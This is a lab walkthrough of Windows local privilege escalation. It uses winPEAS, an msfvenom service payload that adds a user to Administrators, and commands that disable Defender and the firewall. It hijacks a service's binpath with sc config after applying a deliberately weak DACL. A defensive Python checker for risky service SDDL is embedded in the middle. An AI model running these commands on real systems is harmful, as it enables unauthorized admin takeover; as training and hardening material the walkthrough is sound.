Windows Privilege Escalation
Using WinPeas
Making use of an exe that is vulnerable to unquoted service paths
The target Windows machine has a non-privileged user: localuser
Use MSFVenom to generate an executable (ASCService.exe) that adds localuser to the local Administrators group
1. Generate Payload using MSFVenom
#Generate the malicious exe
msfvenom -p windows/exec CMD='net localgroup administrators localuser /add' -f exe-service -o ASCService.exe

2. Start Web Server on Attack Machine
# Python web server on the attack machine
python3 -m http.server
3. Disable Windows Defender & Firewall on Victim Windows Machine
Run the following in an elevated (Administrator) PowerShell:
Set-MpPreference -DisableRealtimeMonitoring $true
Set-MpPreference -MAPSReporting 0
Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False
4. Connect back to the Attack Machine from the Windows Victim via browser

Navigate to the attack machine's web server and download the payload

Move the download to the C:\ folder
Next we need to add permissions so that any local user is able to start, stop and reconfigure the service. This is how we simulate excessive permissions on a service.
# Run cmd as administrator
sc sdset AdvancedSystemCareService9 D:AR(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)(A;;CCLCSWLOCRRC;;;IU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
You should see the response [SC] SetServiceObjectSecurity SUCCESS.
Run Command Prompt as a Different User
Search for cmd > right-click > Run as different user (log in as localuser)
Check which accounts are in the local Administrators group
C:\> net localgroup administrators

Run WinPeas.exe

Run check for services information
C:\> winPEASx64.exe cmd servicesinfo

A few sections often used for privilege escalation are "Interesting Services -non Microsoft-" and "Modifiable Services".
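What winPEAS flags under "Modifiable Services" is exactly the condition the sc sdset command earlier creates: a service DACL that grants change-config or start/stop rights to a principal other than SYSTEM and Administrators. The following checker is an added example, not part of this walkthrough or of winPEAS. It parses a service security descriptor in SDDL form (the format `sc sdshow <service>` prints and `sc sdset` consumes), decodes the two-letter right codes as Windows interprets them on a service object, and reports every allow-ACE that gives a non-trusted principal the ability to repoint the service (SERVICE_CHANGE_CONFIG, WRITE_DAC, WRITE_OWNER or a generic write) or to bounce it (start/stop/pause). The trusted set {SY, BA}, the severity labels and the BASELINE_SDDL reference descriptor are assumptions made for this example; LAB_SDDL is the descriptor from the sc sdset step above.

```python
import re
from dataclasses import dataclass

# Two-letter SDDL right codes as Windows interprets them on a SERVICE object
# (the same letters mean something else on a file), with the access-mask bit
# each one sets so that ACEs written as a hex mask can be decoded as well.
RIGHT_BITS = {
    "CC": 0x00000001,  # SERVICE_QUERY_CONFIG
    "DC": 0x00000002,  # SERVICE_CHANGE_CONFIG (change binPath / run-as account)
    "LC": 0x00000004,  # SERVICE_QUERY_STATUS
    "SW": 0x00000008,  # SERVICE_ENUMERATE_DEPENDENTS
    "RP": 0x00000010,  # SERVICE_START
    "WP": 0x00000020,  # SERVICE_STOP
    "DT": 0x00000040,  # SERVICE_PAUSE_CONTINUE
    "LO": 0x00000080,  # SERVICE_INTERROGATE
    "CR": 0x00000100,  # SERVICE_USER_DEFINED_CONTROL
    "SD": 0x00010000,  # DELETE
    "RC": 0x00020000,  # READ_CONTROL
    "WD": 0x00040000,  # WRITE_DAC (rewrite the ACL itself)
    "WO": 0x00080000,  # WRITE_OWNER
    "GA": 0x10000000,  # GENERIC_ALL
    "GX": 0x20000000,  # GENERIC_EXECUTE
    "GW": 0x40000000,  # GENERIC_WRITE
    "GR": 0x80000000,  # GENERIC_READ
}
# Rights that let the holder change what the service executes or who controls it.
TAKEOVER_RIGHTS = {"DC", "WD", "WO", "GA", "GW"}
# Rights that let the holder restart the service, i.e. make a changed binPath run.
CONTROL_RIGHTS = {"RP", "WP", "DT"}
# Well-known SID aliases that appear in the trustee field of an ACE.
ALIASES = {"SY": "Local System", "BA": "Administrators", "WD": "Everyone",
           "IU": "Interactive users", "AU": "Authenticated users", "BU": "Users",
           "SU": "Service logon", "AN": "Anonymous", "LS": "Local Service",
           "NS": "Network Service"}
# Assumption for this example: only these principals may hold full control.
TRUSTED = {"SY", "BA"}


@dataclass
class Ace:
    ace_type: str   # "A" allow, "D" deny, "AU" audit, ...
    rights: set     # two-letter codes
    trustee: str    # alias such as "WD" or a raw S-1-... SID


@dataclass
class Finding:
    trustee: str
    principal: str
    severity: str   # HIGH: can repoint the service; MEDIUM: can only bounce it
    takeover: list
    control: list


def decode_rights(text):
    """Rights field of an ACE -> set of codes; accepts "CCDC..." or a hex mask."""
    if text.lower().startswith("0x"):
        mask = int(text, 16)
        return {code for code, bit in RIGHT_BITS.items() if mask & bit}
    return {text[i:i + 2] for i in range(0, len(text), 2)}


def parse_dacl(sddl):
    """Return the ACEs of the D: section; O:, G: and the S: audit list are skipped.
    Assumes the plain six-field ACEs that sc sdshow prints (no conditional ACEs)."""
    aces, section, i = [], None, 0
    while i < len(sddl):
        ch = sddl[i]
        if ch in "OGDS" and sddl[i + 1:i + 2] == ":":
            section, i = ch, i + 2          # new section marker, e.g. "D:" or "S:"
        elif ch == "(":
            end = sddl.index(")", i)
            if section == "D":
                parts = sddl[i + 1:end].split(";")
                if len(parts) != 6:
                    raise ValueError(f"unexpected ACE syntax: {sddl[i:end + 1]}")
                aces.append(Ace(parts[0], decode_rights(parts[2]), parts[5]))
            i = end + 1
        else:
            i += 1                          # DACL flags such as "AR" / "AI"
    return aces


def audit_service_sddl(sddl, trusted=TRUSTED):
    """Report allow-ACEs that give a non-trusted principal takeover or control rights."""
    findings = []
    for ace in parse_dacl(sddl):
        if ace.ace_type != "A" or ace.trustee in trusted:
            continue
        takeover = sorted(ace.rights & TAKEOVER_RIGHTS)
        control = sorted(ace.rights & CONTROL_RIGHTS)
        if takeover or control:
            findings.append(Finding(ace.trustee, ALIASES.get(ace.trustee, ace.trustee),
                                    "HIGH" if takeover else "MEDIUM", takeover, control))
    return findings


# The descriptor the walkthrough applies with sc sdset (deliberately weak).
LAB_SDDL = ("D:AR(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
            "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)(A;;CCLCSWLOCRRC;;;IU)"
            "S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")
# Constructed reference descriptor: only SYSTEM and Administrators can change or
# control the service; interactive and service logons can only query it.
BASELINE_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
                 "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)")

if __name__ == "__main__":
    for label, sddl in (("lab", LAB_SDDL), ("baseline", BASELINE_SDDL)):
        for f in audit_service_sddl(sddl):
            print(f"{label}: {f.severity} {f.principal} ({f.trustee}) "
                  f"takeover={f.takeover} control={f.control}")
```

Run against LAB_SDDL the only finding is Everyone (WD) with DC, WD and WO plus start/stop, which is the single ACE that turns this service into a privilege-escalation path; BASELINE_SDDL produces no findings. On a real host the input is the string `sc sdshow <service>` returns, and a WD/BU/AU/IU trustee with a HIGH finding is what a hardening pass should fix with sc sdset.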
Now query the service using
sc qc AdvancedSystemCareService9
# The output shows this service runs as LocalSystem
Next, confirm that localuser is allowed to stop the service:
net stop AdvancedSystemCareService9
Now modify the service binpath so that it points to the executable we uploaded, which adds localuser to the Administrators group:
sc config AdvancedSystemCareService9 binpath= "C:\ASCService.exe"
Now start the service, which runs our payload executable:
net start AdvancedSystemCareService9
Since we have permission to modify the service itself, we leverage the service (running as LocalSystem) to add localuser to the local Administrators group. Verify the result:
net localgroup administrators